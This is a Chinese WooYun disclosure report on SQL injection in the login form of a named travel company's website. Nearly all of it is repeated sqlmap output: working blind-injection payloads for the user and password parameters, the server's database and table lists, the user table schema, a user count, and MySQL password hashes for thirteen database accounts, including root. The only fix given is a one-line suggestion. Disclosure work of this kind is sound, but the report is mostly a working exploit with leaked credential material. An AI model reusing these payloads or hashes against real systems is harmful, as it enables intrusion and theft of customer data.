当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114029

漏洞标题:广州市特网网络科技有限公司SQL注入(POST)2#

相关厂商:广州市特网网络科技有限公司

漏洞作者: hh2014

提交时间:2015-05-14 14:26

修复时间:2015-06-28 14:28

公开时间:2015-06-28 14:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入

详细说明:

http://www.niuhuhu.com/user/login


post参数

user=*&password=*&back=


user和password两个参数都存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
current user:    'root@localhost'
current database:    'travel_schema'
available databases [11]:
[*] _Travel
[*] dedecmsv57gbksp1
[*] dedecmsv57utf8sp1
[*] information_schema
[*] mysql
[*] temp
[*] test
[*] Tewang
[*] travel_schema
[*] waa
[*] zhengjie
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
current user:    'root@localhost'
database management system users password hashes:
[*] 14site [1]:
    password hash: *EA263CB550205B4245A14D4DC212AD82315684CF
[*] 5booking_com [1]:
    password hash: *5C493E7F9411A817A59404A60AC99D1E53CA8DD2
[*] 99sleep_com [1]:
    password hash: *EBB48B85A4B11A91BB79145AEE97F3F629202372
[*] c185 [1]:
    password hash: *EB61DC2E09F115F41F5C687F2F5E9538B8FD96E1
[*] c185_com [1]:
    password hash: *2F00E66655D9676B4B96309BC264ED939D408E30
[*] dedecmsv57gbksp1 [1]:
    password hash: *031352AD799E791B288880650C9ACC7BEDEABBBA
[*] fair020_com [1]:
    password hash: *E2855AB82665B9548026F7D1C6E490AF3360712B
[*] gbqs_c185_com [1]:
    password hash: *C03B343D4E2E5294B49B0DB4FDA74D819C88AD42
[*] guest [1]:
    password hash: *E331263D8F7DE6B5EFD787A7BC2E55984F55BEB5
[*] niunu_com [1]:
    password hash: *00044DCC7E037279C7EEC4DD363D9E988BFF6F3D
[*] qqhotel [1]:
    password hash: *540244A0C16792D36E5D8C6AD395F8F5DCE/82A9
[*] root [1]:
    password hash: *EB61DC2E09F115F41F5C687F2F5E9538B8FD96E1
[*] yunjiankong [1]:
    password hash: *67CCB3E4C7D082F59E21B16E36C6655A938EBABE
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
[107 tables]
+--------------------------+
| Tkds                     |
| _ly_hotel                |
| _new_hotel               |
| expo_industr             |
| hotel_order_2(11         |
| user\\feedback           |
| user                     |
| car_rental_brands        |
| car_rental_cars          |
| car_rental_orders        |
| car_rental_suppliers     |
| car_rentals              |
| expo                     |
| expo_hall                |
| flight_aircraft_models   |
| flight_airhines          |
| flight_airports          |
| flight_orders            |
| flight_timetables        |
| hotel                    |
| hotel_addition           |
| hotel_aware              |
| hotel_by                 |
| hotel_card               |
| hotel_chain              |
| hotel_comment            |
| hotel_config             |
| hotel_cpc                |
| hotel_cpc2               |
| hotel_cpc_online         |
| hotel_distance           |
| hotel_facility           |
| hotel_offline            |
| hotel_option             |
| hotel_order              |
| hotel_order2             |
| hotel_orderX2012         |
| hotel_order_201408131112 |
| hotel_peer               |
| hotel_picture            |
| hotel_room               |
| hotel_room_cache         |
| hotel_room_elong         |
| hotel_room_names         |
| hotel_room_travelsky     |
| hotel_room_type          |
| hotel_themes             |
| hotel_tip                |
| hotel_train              |
| hotelordersms            |
| link                     |
| location                 |
| location2                |
| location_airport         |
| location_by              |
| location_city            |
| location_district        |
| location_division        |
| location_picture         |
| location_province        |
| location_school          |
| location_subway          |
| location_type            |
| locationofhotels         |
| locations                |
| locationtopic            |
| ly_city                  |
| ly_hotel                 |
| ly_hotel_est             |
| ly_hotel_id              |
| ly_hotel_image           |
| manage                   |
| manage_config            |
| manage_file              |
| manage_level             |
| manage_limits            |
| management_limits        |
| managements              |
| master_limits            |
| masters                  |
| new_hotel                |
| new_hotel_image          |
| new_hotel_room           |
| news                     |
| news_comment             |
| news_tag                 |
| notices                  |
| scenic                   |
| sigfts                   |
| sight_orders             |
| sight_pictures           |
| sight_subjects           |
| sight_tickets            |
| site                     |
| train_station            |
| user_bonus_urges         |
| user_bonuses             |
| user_exchange            |
| user_exchange_coods      |
| user_extraction_bonus    |
| user_integral            |
| user_surveys             |
| visa_countrys            |
| visa_orders              |
| visa_require             |
| visa_types               |
| visas                    |
+--------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
Table: user
[32 columns]
+------------------------+
| Column                 |
+------------------------+
| _id                    | int(11)          |
| u^is-emailverify       |
| u_emailverify-code     | varchar(255)     |
| u_emailverify-lasttime | varchar(255)     |
| u_id-site              | int(11)          |
| u_integral-already     | int(11)          |
| u_integral-deduct      | int(11)          |
| u_integral-superfluity | int(11)          |
| u_inter-check          | int(11)          |
| u_inter-noshow         | int(11)          |
| u_name-full            | varchar(100)     |
| u_time-insert          | timestamp        |
| u_time-sign            | varchar(500)     |
| u_time-update          | timestamp        |
| uPintegral-check       |
| uPintegral-noshow      |
| u_address              | varchar(500)     |
| u_avatar               | varchar(255)     |
| u_fax                  | varcgar(100)     |
| u_id                   | int(10) unsigned |
| u_integral             | int(11)          |
| u_inter                | int(11)          |
| u_last_login_ip        | varchar(200)     |
| u_level                | int(11)          |
| u_mail                 | varchar(100)     |
| u_name                 | varchar(255)     |
| u_nick_name            | varchar(255)     |
| u_phone                | varchar(100)     |
| u_sex                  | varchar(50)      |
| u_site                 | varchar(255)     |
| u_tel                  | varchar(100)     |
| uXpassword             |
+------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
Table: user
[32 columns]
+------------------------+
| Column                 |
+------------------------+
| _id                    | int(11)          |
| u^is-emailverify       |
| u_emailverify-code     | varchar(255)     |
| u_emailverify-lasttime | varchar(255)     |
| u_id-site              | int(11)          |
| u_integral-already     | int(11)          |
| u_integral-deduct      | int(11)          |
| u_integral-superfluity | int(11)          |
| u_inter-check          | int(11)          |
| u_inter-noshow         | int(11)          |
| u_name-full            | varchar(100)     |
| u_time-insert          | timestamp        |
| u_time-sign            | varchar(500)     |
| u_time-update          | timestamp        |
| uPintegral-check       |
| uPintegral-noshow      |
| u_address              | varchar(500)     |
| u_avatar               | varchar(255)     |
| u_fax                  | varcgar(100)     |
| u_id                   | int(10) unsigned |
| u_integral             | int(11)          |
| u_inter                | int(11)          |
| u_last_login_ip        | varchar(200)     |
| u_level                | int(11)          |
| u_mail                 | varchar(100)     |
| u_name                 | varchar(255)     |
| u_nick_name            | varchar(255)     |
| u_phone                | varchar(100)     |
| u_sex                  | varchar(50)      |
| u_site                 | varchar(255)     |
| u_tel                  | varchar(100)     |
| uXpassword             |
+------------------------+
select count(u_name) from user:    '66600''


就不深入了,hotel_order表,包含大量用户订单信息

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
current user:    'root@localhost'
current database:    'travel_schema'
available databases [11]:
[*] _Travel
[*] dedecmsv57gbksp1
[*] dedecmsv57utf8sp1
[*] information_schema
[*] mysql
[*] temp
[*] test
[*] Tewang
[*] travel_schema
[*] waa
[*] zhengjie
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
current user:    'root@localhost'
database management system users password hashes:
[*] 14site [1]:
    password hash: *EA263CB550205B4245A14D4DC212AD82315684CF
[*] 5booking_com [1]:
    password hash: *5C493E7F9411A817A59404A60AC99D1E53CA8DD2
[*] 99sleep_com [1]:
    password hash: *EBB48B85A4B11A91BB79145AEE97F3F629202372
[*] c185 [1]:
    password hash: *EB61DC2E09F115F41F5C687F2F5E9538B8FD96E1
[*] c185_com [1]:
    password hash: *2F00E66655D9676B4B96309BC264ED939D408E30
[*] dedecmsv57gbksp1 [1]:
    password hash: *031352AD799E791B288880650C9ACC7BEDEABBBA
[*] fair020_com [1]:
    password hash: *E2855AB82665B9548026F7D1C6E490AF3360712B
[*] gbqs_c185_com [1]:
    password hash: *C03B343D4E2E5294B49B0DB4FDA74D819C88AD42
[*] guest [1]:
    password hash: *E331263D8F7DE6B5EFD787A7BC2E55984F55BEB5
[*] niunu_com [1]:
    password hash: *00044DCC7E037279C7EEC4DD363D9E988BFF6F3D
[*] qqhotel [1]:
    password hash: *540244A0C16792D36E5D8C6AD395F8F5DCE/82A9
[*] root [1]:
    password hash: *EB61DC2E09F115F41F5C687F2F5E9538B8FD96E1
[*] yunjiankong [1]:
    password hash: *67CCB3E4C7D082F59E21B16E36C6655A938EBABE
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
[107 tables]
+--------------------------+
| Tkds                     |
| _ly_hotel                |
| _new_hotel               |
| expo_industr             |
| hotel_order_2(11         |
| user\\feedback           |
| user                     |
| car_rental_brands        |
| car_rental_cars          |
| car_rental_orders        |
| car_rental_suppliers     |
| car_rentals              |
| expo                     |
| expo_hall                |
| flight_aircraft_models   |
| flight_airhines          |
| flight_airports          |
| flight_orders            |
| flight_timetables        |
| hotel                    |
| hotel_addition           |
| hotel_aware              |
| hotel_by                 |
| hotel_card               |
| hotel_chain              |
| hotel_comment            |
| hotel_config             |
| hotel_cpc                |
| hotel_cpc2               |
| hotel_cpc_online         |
| hotel_distance           |
| hotel_facility           |
| hotel_offline            |
| hotel_option             |
| hotel_order              |
| hotel_order2             |
| hotel_orderX2012         |
| hotel_order_201408131112 |
| hotel_peer               |
| hotel_picture            |
| hotel_room               |
| hotel_room_cache         |
| hotel_room_elong         |
| hotel_room_names         |
| hotel_room_travelsky     |
| hotel_room_type          |
| hotel_themes             |
| hotel_tip                |
| hotel_train              |
| hotelordersms            |
| link                     |
| location                 |
| location2                |
| location_airport         |
| location_by              |
| location_city            |
| location_district        |
| location_division        |
| location_picture         |
| location_province        |
| location_school          |
| location_subway          |
| location_type            |
| locationofhotels         |
| locations                |
| locationtopic            |
| ly_city                  |
| ly_hotel                 |
| ly_hotel_est             |
| ly_hotel_id              |
| ly_hotel_image           |
| manage                   |
| manage_config            |
| manage_file              |
| manage_level             |
| manage_limits            |
| management_limits        |
| managements              |
| master_limits            |
| masters                  |
| new_hotel                |
| new_hotel_image          |
| new_hotel_room           |
| news                     |
| news_comment             |
| news_tag                 |
| notices                  |
| scenic                   |
| sigfts                   |
| sight_orders             |
| sight_pictures           |
| sight_subjects           |
| sight_tickets            |
| site                     |
| train_station            |
| user_bonus_urges         |
| user_bonuses             |
| user_exchange            |
| user_exchange_coods      |
| user_extraction_bonus    |
| user_integral            |
| user_surveys             |
| visa_countrys            |
| visa_orders              |
| visa_require             |
| visa_types               |
| visas                    |
+--------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
Table: user
[32 columns]
+------------------------+
| Column                 |
+------------------------+
| _id                    | int(11)          |
| u^is-emailverify       |
| u_emailverify-code     | varchar(255)     |
| u_emailverify-lasttime | varchar(255)     |
| u_id-site              | int(11)          |
| u_integral-already     | int(11)          |
| u_integral-deduct      | int(11)          |
| u_integral-superfluity | int(11)          |
| u_inter-check          | int(11)          |
| u_inter-noshow         | int(11)          |
| u_name-full            | varchar(100)     |
| u_time-insert          | timestamp        |
| u_time-sign            | varchar(500)     |
| u_time-update          | timestamp        |
| uPintegral-check       |
| uPintegral-noshow      |
| u_address              | varchar(500)     |
| u_avatar               | varchar(255)     |
| u_fax                  | varcgar(100)     |
| u_id                   | int(10) unsigned |
| u_integral             | int(11)          |
| u_inter                | int(11)          |
| u_last_login_ip        | varchar(200)     |
| u_level                | int(11)          |
| u_mail                 | varchar(100)     |
| u_name                 | varchar(255)     |
| u_nick_name            | varchar(255)     |
| u_phone                | varchar(100)     |
| u_sex                  | varchar(50)      |
| u_site                 | varchar(255)     |
| u_tel                  | varchar(100)     |
| uXpassword             |
+------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com&password=123456' RLIKE (SELECT (CASE WHEN (5083=5083) THEN 123456 ELSE 0x28 END)) AND 'hZdN'='hZdN&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: user=test@126.com') RLIKE (SELECT (CASE WHEN (7210=7210) THEN 0x7a6d797932303135403132362e636f6d ELSE 0x28 END)) AND ('xVJv'='xVJv&password=123456&back=
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: travel_schema
Table: user
[32 columns]
+------------------------+
| Column                 |
+------------------------+
| _id                    | int(11)          |
| u^is-emailverify       |
| u_emailverify-code     | varchar(255)     |
| u_emailverify-lasttime | varchar(255)     |
| u_id-site              | int(11)          |
| u_integral-already     | int(11)          |
| u_integral-deduct      | int(11)          |
| u_integral-superfluity | int(11)          |
| u_inter-check          | int(11)          |
| u_inter-noshow         | int(11)          |
| u_name-full            | varchar(100)     |
| u_time-insert          | timestamp        |
| u_time-sign            | varchar(500)     |
| u_time-update          | timestamp        |
| uPintegral-check       |
| uPintegral-noshow      |
| u_address              | varchar(500)     |
| u_avatar               | varchar(255)     |
| u_fax                  | varcgar(100)     |
| u_id                   | int(10) unsigned |
| u_integral             | int(11)          |
| u_inter                | int(11)          |
| u_last_login_ip        | varchar(200)     |
| u_level                | int(11)          |
| u_mail                 | varchar(100)     |
| u_name                 | varchar(255)     |
| u_nick_name            | varchar(255)     |
| u_phone                | varchar(100)     |
| u_sex                  | varchar(50)      |
| u_site                 | varchar(255)     |
| u_tel                  | varchar(100)     |
| uXpassword             |
+------------------------+
select count(u_name) from user:    '66600'

修复方案:

参数过滤

版权声明:转载请注明来源 hh2014@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝